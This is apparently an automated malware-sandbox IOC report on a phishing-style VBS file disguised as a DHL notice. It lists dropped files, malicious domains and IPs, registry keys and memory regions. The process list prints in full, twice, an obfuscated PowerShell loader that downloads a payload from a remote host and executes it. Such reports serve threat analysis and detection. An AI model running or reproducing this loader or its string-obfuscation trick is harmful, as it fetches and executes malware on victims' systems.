IOC Report
DHL-9384915702.vbs

loading gif

Files

File Path
Type
Category
Malicious
DHL-9384915702.vbs
ASCII text, with very long lines (1995), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1jilly03.0n4.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_do3g3mpq.bnv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rkurclzx.isf.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_suagtsb1.mpi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Bolthead.Lov
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHL-9384915702.vbs"
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 1
malicious
C:\Windows\System32\PING.EXE
ping %.%.%.%
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c dir
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Kerflap = 1;$Needgates='Substrin';$Needgates+='g';Function hierarchized($Extortion134){$Negering=$Extortion134.Length-$Kerflap;For($Anskydendes=5; $Anskydendes -lt $Negering; $Anskydendes+=(6)){$Malemaade+=$Extortion134.$Needgates.Invoke($Anskydendes, $Kerflap);}$Malemaade;}function Wauling($Dalasi){. ($Tiologiens) ($Dalasi);}$Ballsy=hierarchized ' bowmM Ang,o Het,zForbri UdvilWailslTids.aVisit/R.bor5Super..ilie0 Aand Proph(M nesW.upetiNonsunmedfldmist oStranwAkmitsTrips GrsgaNI.depTSkits Wam u1 tal 0Forst. Tige0Inter; und, SaalaWRespoiJambonNaadi6Sym o4Lgsov;Overa BeweaxMetr 6 genz4Tombl;.omin RevierVelvev Vera:Terr 1Pe,so2 Snor1 Elit.Sente0 Samm)disor UdskyGForreeNiveac Silkk I troYourn/Bisk 2F.rto0Geo,g1 Kret0 Solv0Paleo1,ortb0Negli1 A.pe onsFrntgeiHospirb,okmeMinisf devaoFrimnx Tes./ Fdes1snk,l2Selfe1Sge,r. Daem0Neutr ';$brydningsvinkel=hierarchized 'AsienU ocisga,steLindrrHav,m- TromA.krivgSlvfee B,udnSaladt Figu ';$Valutasatsen=hierarchized 'GkanthBibeltBall,tT,werpSa.mm:Vig.r/Ov,rm/ Gru nAnde i Gg,htChurniLepidoTours.yintrcUnbe,o CleimInvok/Rus,ixMetad2Ge.ne/ Fr,mTSlethaDadairV.ndstIdiomaVegetrKondeeFigsh.Gide.curesuh campmHudaf ';$Udfyldningrs=hierarchized 'Slski>Par c ';$Tiologiens=hierarchized ' AaleiNoneveTame x verf ';$pseudotuberculosis = hierarchized 'ObdukeimponcDishahCrommotimet Frs.e% .rafaMorkepa,taipUdf id P.ovaWxy stNit aa .imm%Gibel\ Tre.BPrvepo .hellFag ttHydrohIndfreVanesaHeterd nder.ForegLAlimeo LocuvSagfr Ulykk& Gesa& tes, Succee Dia,c TriahOrganoBeret Co.j$ Skr ';Wauling (hierarchized 'Scapu$Tunhog Til.lPhleboSkrifbGolpna Butll P,rk:AggraSPheocaStrsknUdhuls Starerygsvv ,ammeTilbyrRetsodLig.teGrssenHypere GranrStrkn5reakt5For,k=Bloka( tikpcMund mWeedidLight Solso/ P.uncRadbu Anti$Averap Phl s por,etrokeuP ndrdOffero.emottFaglruFamilbVoicee Ove rBrugec.hokiuPapawl Bu.yoAfpres SnydiFlo.psGst,l)Guris ');Wauling (hierarchized 'Ergon$Bef,lgRes rl Trsao.indsbfakleaSa mel,cabi:KaktuI tubenDeadlgOxamme,iskenHrdedi temmrGlorysStutsePeriekM,lluvIsraeeCelienKeepisMainpe.edventilb.s Mode=Disun$S.ackV SlavaJailol ramuuFilistForseaextrasPaafuaGettatInt,rs NummeLinten Bash. Chyls R sepTundrlHemimiObskntAlarm(Hemia$.kjteUK,tapdUdenrfTabely TelllCondydUdspinDerreiHensinScombgDuettrOvermsSk ue)R.fil ');$Valutasatsen=$Ingenirsekvensens[0];Wauling (hierarchized ' ferv$billeg A,drlF ldfoSph gbchitiaUnmisl Forv:PolitBPreaga CercrCorniyEftertPisheo B,shnOv,rjeForsprPrintnB.onfeSubak=HklenN BlgeeBechawSk ld- g.noOKont bVverfj traneOstracOmst tRagn, Fr,gmSKredsy BrugsBeg,ntRumbaeInfirmBesgs.OpkobNautoteAlarmt Flos.BucciWBaldie.rranbCo naCInitilbolteiTransena,adnC.ngot C iv ');Wauling (hierarchized ' Dkr.$ TidsB,ircua drogrCoagmyNon.ltSectvo SydynEu.opeCitr,rEngranCou te M na.P.ectH Indle SkolaSammedaktsteSkoldr.henosAmatr[Karli$ReuphbFractr Til,yCivildStrafnPowdeiRadianCel.ugBesp,sOverbvP nneiBalonnF.agrkSkr.ser eoplAtten] Kern= Blan$HematB bo.iaHel.el Encolbuyves OpslyGynom ');$Decos151=hierarchized ' reexB Afk aBld,grFamily ConvtC,opfoUnde n Sk,ve Rep r,gvarnCho pe Fort.SnedkDfollooUdbudwGrampnPengel,ineloAnt aaThorodRrfleF Lagrinos.glLam ie,rumf(Bog,r$C,rdoVUnpufa S.kilSlanguDermatSociaa SciesBondea IntetHasarsPerseeCom,enstyri,Super$ M,nsDSknliis raprDort.iharbogBil.ieSubsunSubcotFootlsO.ers)Upgos ';$Decos151=$Sanseverdener55[1]+$Decos151;$Dirigents=$Sanseverdener55[0];Wauling (hierarchized 'Hjdep$L.oncgHovedlLemogodispubFr.vraCaubelRabu.:OpskaU DelfnKuldscLep,ooFairgmKamufehun.elOve,hiDeacilAarspy Frug6Figur1Oleom=Recip(GenneTM sgieBurghsIndkntT efa-RacewP,illsa E,entEpitrhAnacr Knska$c,itrD.nnueiT.lskrhorolistatugStr,neTo aynMeritt SildsUnsal) Terr ');while (!$Uncomelily61) {Wauling (hierarchized ' stoc$forhugMaur.lRumaeoD svebFrysea lgellHjtel:,lawecEkspeoProp,n CycadOctavoUnspaeVanges L,na= Regi$ OlaitLyrifrformuuSubrueTotte ') ;Wauling $Decos151;Wauling (hierarchized 'Hi deSTredjtFrednaA prirSmasktRecep-Sade SMut,llChelyeAghaseTh rmpBrode Anti,4Senen ');Wauling (hierarchized ' Spec$Anthrg solilDefekocommobSheeta Tek.lT.ppe:PandaUExpu,nMi,cocPostsoQuad.mLuci eGondolFi,vaiNaboilnatioyGlyce6 Hone1Dubli=Archk(MagisTTilpreViviasRustntBache-RensePHabilaJernbtPlig.hFr,nk Propo$ arnDAffali T perSne kiSidstg ,dbye,tgaanBriartfu arsKkken) .org ') ;Wauling (hierarchized 'Fourn$UegengMultilOpenhoFaellbDarksaQuittlSkoli:TeknifSerieo.ctahrDevial Jubiy Diams telftJensle Dradl,verts StereKraftskurves uctit DampePeo,ldStilbeAbortru,dernHomote Dest=Lukni$S,debgMatr,lDialyo Ddlkb.iropaArb.jlUntre: PapiU K.rtnlovprepianilSnigliSpoejcStegeiArsentPr.deeSnegldSykl,+Loc p+overd%.onvi$SedatISpendnAvilegAtomie BetrnUsantiFinevrVirkesDaadleAmn,okUnbrovNoncaeCamelnKnst,sBlysteProctnSpi,ds Sedu.ThackcVa dfoHendeuMik onR.surt kree ') ;$Valutasatsen=$Ingenirsekvensens[$forlystelsesstederne];}Wauling (hierarchized 'Sikke$OmkomgSyst lVisiooBagreb KystaSubdolB,ass:RituaM Ene.iSpindcPolysrSkrupoMarcobAureoiCa saoUnsantPreapaPaalg ,ead=Child Mon gGAnaleeIden.t elte-atuneCBr gto Gen,n eprotUncoueMalvan ,ftetst.nk Paas$MagteD Un.tiTransrUdtr.iHjlpegVocale ollnOpdrit UsassUnadd ');Wauling (hierarchized 'Bogkb$Formag VrtelBathyoC.boobCanula Supel ust:KompaBSangletrop,a,hicka MentnFestsd Afb.iModvinSej,sg nskeeFloccrReguln Luk e Fi,a Klim.=Overm Farol[ awaiSSilveyUnbotsB oketLunkheIngram Hove.misceC VansoHalvenA,rydvPteroe anosrMen.atExe u]Vared:Fase.:N,stoFEddierA,stdoUntrumHaandBpers,aDyrtisTeksteProun6Foder4 GkkeSM.rget Sfyrr Kon.i S.enn DepugHalsh( Mang$Po osMGuny,iUndevcFrancrBerapoFrdi,b V,idiHutiaoCre ktKryptaLithe)Runds ');Wauling (hierarchized 'E olu$Fejebg fogelBekraoAccenb BotaaDespolSvale:AnchoND.absyUnba.d ThuseWarr,rDow lsSkrae Shoo=Spic, Sprr.[AmbulSSpectypatensAarsttDim,teMorfim shan.SlageTOrg,neRankrxEuphot olos.GulvhECo.ntn hidsc AnaloDaterdRecauiC,mmenEn aggBypas]and.a:Jensm:Hvn nAbarahS EstaCSusanI streISahhb.tr.ioG OutfeMembrt SupeSFrotat OutrrM,hoeiPeri,n Bestgamen ( ast$InsolBBasisePlkniaFarveaveinsnJungldtelegiDispln.attegDorype,omstrLizi n SymmeJutta)tofte ');Wauling (hierarchized 'Civi,$ PaavgHyklelSkrupoO,erpbBoydpaNoncllShake:U derEBlod kKonkrs Apaca Co.lm Unarea,vesnDemon=,tege$SundeN Mi.wyPallad J.steUvildrM.ctusAte i.DobbesGingluKartebUdlanskvdentKran,r Fiksi NonanStyrigHinke(Corde3Agast0Bajon8Phpov0Mantl9D,ane7 Reky,En,il2Diste9 gend6 Lsni6Sdest1K sne)Udk.n ');Wauling $Eksamen;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bolthead.Lov && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Kerflap = 1;$Needgates='Substrin';$Needgates+='g';Function hierarchized($Extortion134){$Negering=$Extortion134.Length-$Kerflap;For($Anskydendes=5; $Anskydendes -lt $Negering; $Anskydendes+=(6)){$Malemaade+=$Extortion134.$Needgates.Invoke($Anskydendes, $Kerflap);}$Malemaade;}function Wauling($Dalasi){. ($Tiologiens) ($Dalasi);}$Ballsy=hierarchized ' bowmM Ang,o Het,zForbri UdvilWailslTids.aVisit/R.bor5Super..ilie0 Aand Proph(M nesW.upetiNonsunmedfldmist oStranwAkmitsTrips GrsgaNI.depTSkits Wam u1 tal 0Forst. Tige0Inter; und, SaalaWRespoiJambonNaadi6Sym o4Lgsov;Overa BeweaxMetr 6 genz4Tombl;.omin RevierVelvev Vera:Terr 1Pe,so2 Snor1 Elit.Sente0 Samm)disor UdskyGForreeNiveac Silkk I troYourn/Bisk 2F.rto0Geo,g1 Kret0 Solv0Paleo1,ortb0Negli1 A.pe onsFrntgeiHospirb,okmeMinisf devaoFrimnx Tes./ Fdes1snk,l2Selfe1Sge,r. Daem0Neutr ';$brydningsvinkel=hierarchized 'AsienU ocisga,steLindrrHav,m- TromA.krivgSlvfee B,udnSaladt Figu ';$Valutasatsen=hierarchized 'GkanthBibeltBall,tT,werpSa.mm:Vig.r/Ov,rm/ Gru nAnde i Gg,htChurniLepidoTours.yintrcUnbe,o CleimInvok/Rus,ixMetad2Ge.ne/ Fr,mTSlethaDadairV.ndstIdiomaVegetrKondeeFigsh.Gide.curesuh campmHudaf ';$Udfyldningrs=hierarchized 'Slski>Par c ';$Tiologiens=hierarchized ' AaleiNoneveTame x verf ';$pseudotuberculosis = hierarchized 'ObdukeimponcDishahCrommotimet Frs.e% .rafaMorkepa,taipUdf id P.ovaWxy stNit aa .imm%Gibel\ Tre.BPrvepo .hellFag ttHydrohIndfreVanesaHeterd nder.ForegLAlimeo LocuvSagfr Ulykk& Gesa& tes, Succee Dia,c TriahOrganoBeret Co.j$ Skr ';Wauling (hierarchized 'Scapu$Tunhog Til.lPhleboSkrifbGolpna Butll P,rk:AggraSPheocaStrsknUdhuls Starerygsvv ,ammeTilbyrRetsodLig.teGrssenHypere GranrStrkn5reakt5For,k=Bloka( tikpcMund mWeedidLight Solso/ P.uncRadbu Anti$Averap Phl s por,etrokeuP ndrdOffero.emottFaglruFamilbVoicee Ove rBrugec.hokiuPapawl Bu.yoAfpres SnydiFlo.psGst,l)Guris ');Wauling (hierarchized 'Ergon$Bef,lgRes rl Trsao.indsbfakleaSa mel,cabi:KaktuI tubenDeadlgOxamme,iskenHrdedi temmrGlorysStutsePeriekM,lluvIsraeeCelienKeepisMainpe.edventilb.s Mode=Disun$S.ackV SlavaJailol ramuuFilistForseaextrasPaafuaGettatInt,rs NummeLinten Bash. Chyls R sepTundrlHemimiObskntAlarm(Hemia$.kjteUK,tapdUdenrfTabely TelllCondydUdspinDerreiHensinScombgDuettrOvermsSk ue)R.fil ');$Valutasatsen=$Ingenirsekvensens[0];Wauling (hierarchized ' ferv$billeg A,drlF ldfoSph gbchitiaUnmisl Forv:PolitBPreaga CercrCorniyEftertPisheo B,shnOv,rjeForsprPrintnB.onfeSubak=HklenN BlgeeBechawSk ld- g.noOKont bVverfj traneOstracOmst tRagn, Fr,gmSKredsy BrugsBeg,ntRumbaeInfirmBesgs.OpkobNautoteAlarmt Flos.BucciWBaldie.rranbCo naCInitilbolteiTransena,adnC.ngot C iv ');Wauling (hierarchized ' Dkr.$ TidsB,ircua drogrCoagmyNon.ltSectvo SydynEu.opeCitr,rEngranCou te M na.P.ectH Indle SkolaSammedaktsteSkoldr.henosAmatr[Karli$ReuphbFractr Til,yCivildStrafnPowdeiRadianCel.ugBesp,sOverbvP nneiBalonnF.agrkSkr.ser eoplAtten] Kern= Blan$HematB bo.iaHel.el Encolbuyves OpslyGynom ');$Decos151=hierarchized ' reexB Afk aBld,grFamily ConvtC,opfoUnde n Sk,ve Rep r,gvarnCho pe Fort.SnedkDfollooUdbudwGrampnPengel,ineloAnt aaThorodRrfleF Lagrinos.glLam ie,rumf(Bog,r$C,rdoVUnpufa S.kilSlanguDermatSociaa SciesBondea IntetHasarsPerseeCom,enstyri,Super$ M,nsDSknliis raprDort.iharbogBil.ieSubsunSubcotFootlsO.ers)Upgos ';$Decos151=$Sanseverdener55[1]+$Decos151;$Dirigents=$Sanseverdener55[0];Wauling (hierarchized 'Hjdep$L.oncgHovedlLemogodispubFr.vraCaubelRabu.:OpskaU DelfnKuldscLep,ooFairgmKamufehun.elOve,hiDeacilAarspy Frug6Figur1Oleom=Recip(GenneTM sgieBurghsIndkntT efa-RacewP,illsa E,entEpitrhAnacr Knska$c,itrD.nnueiT.lskrhorolistatugStr,neTo aynMeritt SildsUnsal) Terr ');while (!$Uncomelily61) {Wauling (hierarchized ' stoc$forhugMaur.lRumaeoD svebFrysea lgellHjtel:,lawecEkspeoProp,n CycadOctavoUnspaeVanges L,na= Regi$ OlaitLyrifrformuuSubrueTotte ') ;Wauling $Decos151;Wauling (hierarchized 'Hi deSTredjtFrednaA prirSmasktRecep-Sade SMut,llChelyeAghaseTh rmpBrode Anti,4Senen ');Wauling (hierarchized ' Spec$Anthrg solilDefekocommobSheeta Tek.lT.ppe:PandaUExpu,nMi,cocPostsoQuad.mLuci eGondolFi,vaiNaboilnatioyGlyce6 Hone1Dubli=Archk(MagisTTilpreViviasRustntBache-RensePHabilaJernbtPlig.hFr,nk Propo$ arnDAffali T perSne kiSidstg ,dbye,tgaanBriartfu arsKkken) .org ') ;Wauling (hierarchized 'Fourn$UegengMultilOpenhoFaellbDarksaQuittlSkoli:TeknifSerieo.ctahrDevial Jubiy Diams telftJensle Dradl,verts StereKraftskurves uctit DampePeo,ldStilbeAbortru,dernHomote Dest=Lukni$S,debgMatr,lDialyo Ddlkb.iropaArb.jlUntre: PapiU K.rtnlovprepianilSnigliSpoejcStegeiArsentPr.deeSnegldSykl,+Loc p+overd%.onvi$SedatISpendnAvilegAtomie BetrnUsantiFinevrVirkesDaadleAmn,okUnbrovNoncaeCamelnKnst,sBlysteProctnSpi,ds Sedu.ThackcVa dfoHendeuMik onR.surt kree ') ;$Valutasatsen=$Ingenirsekvensens[$forlystelsesstederne];}Wauling (hierarchized 'Sikke$OmkomgSyst lVisiooBagreb KystaSubdolB,ass:RituaM Ene.iSpindcPolysrSkrupoMarcobAureoiCa saoUnsantPreapaPaalg ,ead=Child Mon gGAnaleeIden.t elte-atuneCBr gto Gen,n eprotUncoueMalvan ,ftetst.nk Paas$MagteD Un.tiTransrUdtr.iHjlpegVocale ollnOpdrit UsassUnadd ');Wauling (hierarchized 'Bogkb$Formag VrtelBathyoC.boobCanula Supel ust:KompaBSangletrop,a,hicka MentnFestsd Afb.iModvinSej,sg nskeeFloccrReguln Luk e Fi,a Klim.=Overm Farol[ awaiSSilveyUnbotsB oketLunkheIngram Hove.misceC VansoHalvenA,rydvPteroe anosrMen.atExe u]Vared:Fase.:N,stoFEddierA,stdoUntrumHaandBpers,aDyrtisTeksteProun6Foder4 GkkeSM.rget Sfyrr Kon.i S.enn DepugHalsh( Mang$Po osMGuny,iUndevcFrancrBerapoFrdi,b V,idiHutiaoCre ktKryptaLithe)Runds ');Wauling (hierarchized 'E olu$Fejebg fogelBekraoAccenb BotaaDespolSvale:AnchoND.absyUnba.d ThuseWarr,rDow lsSkrae Shoo=Spic, Sprr.[AmbulSSpectypatensAarsttDim,teMorfim shan.SlageTOrg,neRankrxEuphot olos.GulvhECo.ntn hidsc AnaloDaterdRecauiC,mmenEn aggBypas]and.a:Jensm:Hvn nAbarahS EstaCSusanI streISahhb.tr.ioG OutfeMembrt SupeSFrotat OutrrM,hoeiPeri,n Bestgamen ( ast$InsolBBasisePlkniaFarveaveinsnJungldtelegiDispln.attegDorype,omstrLizi n SymmeJutta)tofte ');Wauling (hierarchized 'Civi,$ PaavgHyklelSkrupoO,erpbBoydpaNoncllShake:U derEBlod kKonkrs Apaca Co.lm Unarea,vesnDemon=,tege$SundeN Mi.wyPallad J.steUvildrM.ctusAte i.DobbesGingluKartebUdlanskvdentKran,r Fiksi NonanStyrigHinke(Corde3Agast0Bajon8Phpov0Mantl9D,ane7 Reky,En,il2Diste9 gend6 Lsni6Sdest1K sne)Udk.n ');Wauling $Eksamen;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bolthead.Lov && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 3 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
https://api.ipify.org/
104.26.13.205
http://nuget.org/NuGet.exe
unknown
http://nitio.com/x2/Tartare.chmP
unknown
http://nitio.com/x1/NdiheD197.bin
192.185.13.24
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
http://nitio.com
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://aka.ms/pscore68
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://nitio.com/x2/Tartare.chm
192.185.13.24
There are 6 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
concaribe.com
192.185.13.234
malicious
ftp.concaribe.com
unknown
malicious
bg.microsoft.map.fastly.net
199.232.214.172
nitio.com
192.185.13.24
api.ipify.org
104.26.13.205

IPs

IP
Domain
Country
Malicious
192.185.13.234
concaribe.com
United States
malicious
127.0.0.1
unknown
unknown
malicious
192.185.13.24
nitio.com
United States
104.26.13.205
api.ipify.org
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\wab_RASMANCS
FileDirectory
There are 19 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
291B6B81000
trusted library allocation
page read and write
malicious
C596000
direct allocation
page execute and read and write
malicious
257FB000
trusted library allocation
page read and write
malicious
257D1000
trusted library allocation
page read and write
malicious
8B10000
direct allocation
page execute and read and write
malicious
5D65000
trusted library allocation
page read and write
malicious
23B281BD000
heap
page read and write
4B40000
trusted library allocation
page execute and read and write
27C5D000
trusted library allocation
page read and write
75CF000
stack
page read and write
23B27C70000
remote allocation
page read and write
23B28298000
heap
page read and write
2845E000
stack
page read and write
277F7000
heap
page read and write
24F4E000
stack
page read and write
291BEF5C000
heap
page read and write
23B281BD000
heap
page read and write
27807000
heap
page read and write
79F0000
trusted library allocation
page read and write
79C0000
trusted library allocation
page execute and read and write
7FFD9B911000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
23B28229000
heap
page read and write
23B27C70000
remote allocation
page read and write
2F0C000
heap
page read and write
23B282A8000
heap
page read and write
28500000
trusted library allocation
page read and write
4FA98FE000
stack
page read and write
7FFD9BAD0000
trusted library allocation
page read and write
25450000
trusted library allocation
page read and write
277C4000
heap
page read and write
7618000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
796E000
stack
page read and write
23B28492000
heap
page read and write
27C60000
trusted library allocation
page read and write
98F0000
heap
page read and write
4A7F000
stack
page read and write
27C90000
trusted library allocation
page read and write
251E0000
direct allocation
page read and write
23B284AE000
heap
page read and write
27C48000
trusted library allocation
page read and write
23B28232000
heap
page read and write
257F9000
trusted library allocation
page read and write
23B28482000
heap
page read and write
291A7143000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
85D0000
trusted library allocation
page read and write
23B28180000
heap
page read and write
23B28292000
heap
page read and write
250FF000
stack
page read and write
23B2814C000
heap
page read and write
257CD000
trusted library allocation
page read and write
23B28492000
heap
page read and write
9BF0000
direct allocation
page read and write
7A00000
trusted library allocation
page read and write
23B282A8000
heap
page read and write
250BE000
stack
page read and write
23B2833F000
heap
page read and write
D996000
direct allocation
page execute and read and write
27C80000
trusted library allocation
page read and write
28530000
trusted library allocation
page read and write
23B283A9000
heap
page read and write
27C70000
trusted library allocation
page read and write
23B2811F000
heap
page read and write
27C70000
trusted library allocation
page read and write
8490000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
1C673700000
heap
page read and write
7190000
direct allocation
page read and write
23B2834D000
heap
page read and write
291BF047000
heap
page read and write
9ACA000
heap
page read and write
7742000
heap
page read and write
49D0000
trusted library allocation
page read and write
23B262EA000
heap
page read and write
23B2826C000
heap
page read and write
88A7000
heap
page read and write
7A60000
trusted library allocation
page read and write
23B28191000
heap
page read and write
23B2835A000
heap
page read and write
23B2849D000
heap
page read and write
7840000
trusted library allocation
page read and write
23B2837B000
heap
page read and write
27C60000
trusted library allocation
page read and write
23B282A8000
heap
page read and write
27A0000
trusted library allocation
page execute and read and write
1C673600000
heap
page read and write
765D000
heap
page read and write
23B28350000
heap
page read and write
27C5D000
trusted library allocation
page read and write
25540000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
23B28510000
heap
page read and write
23B2835F000
heap
page read and write
23B28111000
heap
page read and write
1C67360B000
heap
page read and write
7A50000
trusted library allocation
page read and write
AD7E1BB000
stack
page read and write
4FA96FD000
stack
page read and write
23B2856F000
heap
page read and write
2545B000
trusted library allocation
page read and write
291A8445000
trusted library allocation
page read and write
318E000
stack
page read and write
4B60000
heap
page execute and read and write
23B28836000
heap
page read and write
25540000
trusted library allocation
page read and write
880C000
stack
page read and write
27C50000
trusted library allocation
page read and write
27C50000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
23B28540000
heap
page read and write
2F80000
heap
page read and write
23B283AD000
heap
page read and write
23B26389000
heap
page read and write
291A6A3A000
heap
page read and write
4746000
remote allocation
page execute and read and write
23B28321000
heap
page read and write
7FFD9B880000
trusted library allocation
page execute and read and write
284F0000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
23B2815C000
heap
page read and write
23B2855E000
heap
page read and write
291A66B0000
trusted library allocation
page read and write
9C60000
direct allocation
page read and write
79D0000
trusted library allocation
page read and write
23B28133000
heap
page read and write
23B287BE000
heap
page read and write
291BEE50000
heap
page read and write
23B26200000
heap
page read and write
98E0000
heap
page readonly
320E000
stack
page read and write
27C60000
trusted library allocation
page read and write
254EC000
stack
page read and write
291A4D0E000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
23B26389000
heap
page read and write
23B28383000
heap
page read and write
4FA90FE000
stack
page read and write
7FFD9BA00000
trusted library allocation
page read and write
23B28335000
heap
page read and write
7FFD9BA70000
trusted library allocation
page read and write
49CA000
trusted library allocation
page execute and read and write
291A6B95000
trusted library allocation
page read and write
23B28B30000
heap
page read and write
854E000
stack
page read and write
2E7C000
heap
page read and write
27C70000
trusted library allocation
page read and write
253FC000
stack
page read and write
27C70000
trusted library allocation
page read and write
27C60000
trusted library allocation
page read and write
9C10000
direct allocation
page read and write
4FA95FB000
stack
page read and write
23B2813B000
heap
page read and write
24EB0000
heap
page read and write
7DF40A7D0000
trusted library allocation
page execute and read and write
27C60000
trusted library allocation
page read and write
25471000
trusted library allocation
page read and write
BB96000
direct allocation
page execute and read and write
78A0000
trusted library allocation
page read and write
49B9000
trusted library allocation
page read and write
25462000
trusted library allocation
page read and write
27CAD000
stack
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
27C70000
trusted library allocation
page read and write
23B2853D000
heap
page read and write
4A3E000
stack
page read and write
291A679C000
heap
page read and write
23B28492000
